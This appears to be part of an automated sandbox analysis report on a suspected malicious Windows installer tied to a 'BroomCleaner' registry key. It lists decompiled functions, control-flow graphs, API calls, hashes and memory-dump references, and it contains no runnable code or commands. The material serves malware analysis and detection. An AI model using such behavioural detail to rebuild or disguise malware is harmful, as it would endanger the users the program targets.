                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                  • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                  • API String ID: 645384303-3819460243
                                                                                                                                                                                                                                  • Opcode ID: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
                                                                                                                                                                                                                                  • Instruction ID: b5f2e25a14bd4d2b29e972ea4905dfdb01325226fa6e36a277c804736715cb88
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71614FB09087009ED710BF65CA45A6FBAF8EF80714F018A2FF4C4A7291D77C58818B6B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403D52 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 448 403d52-403d60 449 403d92-403da3 call 403b63 448->449 450 403d62-403d8f SetFilePointer 448->450 453 403ef7-403f00 449->453 454 403da9-403ddc ReadFile 449->454 450->449 455 403de2-403de6 454->455 456 403ea8-403ead 454->456 455->456 457 403dec-403e05 call 403b63 455->457 456->453 457->453 460 403e0b-403e0f 457->460 461 403e15-403e18 460->461 462 403eba-403eec ReadFile 460->462 463 403e64-403e69 461->463 462->456 464 403eee-403ef1 462->464 465 403eb6-403eb8 463->465 466 403e6b-403ea2 ReadFile 463->466 464->453 465->453 466->456 467 403e1a-403e1d 466->467 467->456 468 403e23-403e4f WriteFile 467->468 469 403e51-403e54 468->469 470 403eaf-403eb4 468->470 469->470 471 403e56-403e62 469->471 470->453 471->463
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Read$PointerWrite
                                                                                                                                                                                                                                  • String ID: PB@
                                                                                                                                                                                                                                  • API String ID: 2113905535-661560245
                                                                                                                                                                                                                                  • Opcode ID: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                                                                                                                                  • Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402853 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 472 402853-402863 473 402869-40288e call 401400 * 2 472->473 474 40297c-402983 472->474 484 402890-4028b0 LoadLibraryExA 473->484 485 4028b8-4028c6 GetModuleHandleA 473->485 475 402a36-402a41 call 40163b 474->475 483 403831-403842 475->483 486 402970-402977 484->486 487 4028b6 484->487 485->484 488 4028c8-4028db GetProcAddress 485->488 486->475 487->488 490 40292d-40293f call 406fcb 488->490 491 4028dd-4028e5 488->491 498 402944-40294b 490->498 494 4028e7-4028fc call 40163b 491->494 495 4028fe-40292b 491->495 494->498 495->498 498->483 501 402951-40295c call 404a27 498->501 501->483 505 402962-40296b FreeLibrary 501->505 506 403677-403678 505->506 506->483
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00402914
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                                                                                                                  • String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
                                                                                                                                                                                                                                  • API String ID: 1437655972-244690609
                                                                                                                                                                                                                                  • Opcode ID: ee53454a27184b2d5a0a5c0d2de0908f6b395ec73dedb038415951f2cacf38c2
                                                                                                                                                                                                                                  • Instruction ID: b62c106c84180e177253e802d98a0aa7ea229c7caaf607f5dbea50c10e3e4377
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee53454a27184b2d5a0a5c0d2de0908f6b395ec73dedb038415951f2cacf38c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB3170B16083009FD710AF25C94876EBBE8BF84764F51893FE485A32D0D7788986DB5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040820E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 507 40820e-40823a GetSystemDirectoryA 508 40824b-40824d 507->508 509 40823c-408249 507->509 510 408252-408296 wsprintfA LoadLibraryExA 508->510 509->510
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                  • String ID: \$C@
                                                                                                                                                                                                                                  • API String ID: 2200240437-1790911818
                                                                                                                                                                                                                                  • Opcode ID: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                  • Instruction ID: 6c0f10e39fe67b0a46f2467a814b7d530fefee384e0f0f9ebaf92f9caf306ff0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D014BB1508704AFD300EF68D98879EBBF4FB84308F54C83DD08996295D7789589CB5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00408299 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 511 408299-4082b9 GetModuleHandleA 512 4082bb-4082be call 40820e 511->512 513 4082cc-4082e1 GetProcAddress 511->513 516 4082c3-4082ca 512->516 515 4082e2-4082e8 513->515 516->513 516->515
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                    • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
                                                                                                                                                                                                                                    • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
                                                                                                                                                                                                                                    • Part of subcall function 0040820E: LoadLibraryExA.KERNEL32 ref: 00408289
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                  • String ID: UXTHEME$C@$C@
                                                                                                                                                                                                                                  • API String ID: 2547128583-1808485004
                                                                                                                                                                                                                                  • Opcode ID: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                  • Instruction ID: 23c7ce911dd590b504e17f07e60dbba2231cf2c7d4590c8d4e2d2ec4458658d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AF08275A00A089BD710AF65D98446FBBF8FB88750B01C47DF98493324EA3499608B9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402613 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 517 402613-402637 call 401400 call 406fcb call 407779 523 40263c-402641 517->523 524 402647-40264e 523->524 525 402a3c-402a41 523->525 527 402650 524->527 528 4026b3-4026b5 524->528 526 403831-403842 525->526 530 402656-40266a WaitForSingleObject 527->530 529 4026c5-4026ce CloseHandle 528->529 529->525 532 403677-403678 529->532 533 40267b-402697 GetExitCodeProcess 530->533 534 40266c-402679 call 408848 530->534 532->526 537 4026b7-4026c3 533->537 538 402699-4026b2 call 407be3 533->538 534->530 537->529 538->528
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                    • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
                                                                                                                                                                                                                                    • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32 ref: 00402661
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00402688
                                                                                                                                                                                                                                    • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
                                                                                                                                                                                                                                    • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 004026C8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                  • API String ID: 3753073698-2564639436
                                                                                                                                                                                                                                  • Opcode ID: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
                                                                                                                                                                                                                                  • Instruction ID: ac6e98feb3a7424ea682bb54f7c96fcb1bdc6a13fb689d46f8fa2a7810285b5b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C218171908600DFD750AF25CD48BAEB7E5EB84315F51887EE489A3380D6795981CF2A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403B63 Relevance: 6.1, APIs: 4, Instructions: 115fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 542 403b63-403b8d GetTickCount 543 403b93-403be0 call 403b31 SetFilePointer 542->543 544 403d35-403d43 call 4039fe 542->544 550 403be3-403c11 call 403ae9 543->550 549 403d48-403d4f 544->549 553 403d45 550->553 554 403c17-403c27 550->554 553->549 555 403c2d-403c34 554->555 556 403c36-403c3d 555->556 557 403c68-403c88 call 40893d 555->557 556->557 558 403c3f-403c63 call 4039fe 556->558 562 403c8a-403c96 557->562 563 403cec-403cf1 557->563 558->557 564 403c98-403cc3 WriteFile 562->564 565 403cdf-403ce6 562->565 563->549 566 403cf3-403cf8 564->566 567 403cc5-403cc8 564->567 565->563 568 403ce8-403cea 565->568 566->549 567->566 569 403cca-403cd7 567->569 568->563 570 403cfa-403d0d 568->570 569->555 572 403cdd 569->572 570->550 571 403d13-403d32 SetFilePointer 570->571 571->544 572->570
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403B7B
                                                                                                                                                                                                                                    • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32 ref: 00403BCB
                                                                                                                                                                                                                                    • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 00403CB8
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32 ref: 00403D2F
                                                                                                                                                                                                                                    • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Pointer$CountDestroyReadTickWindowWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1725291646-0
                                                                                                                                                                                                                                  • Opcode ID: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                  • Instruction ID: f7083fb0e86bb6005b9bf14dc6a8331a2f5849a6e81c63e88d49bae7df8a1a75
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3514AB1A183049FD720DF29E88532A7BB4FF44355F90893EE844A72A0D7789546CF9E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004076B0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 573 4076b0-40770e CreateDirectoryA 574 407710-407712 573->574 575 407714-407721 GetLastError 573->575 576 407741-407748 574->576 575->576 577 407723-40773d SetFileSecurityA 575->577 577->574 578 40773f GetLastError 577->578 578->576
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3449924974-0
                                                                                                                                                                                                                                  • Opcode ID: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
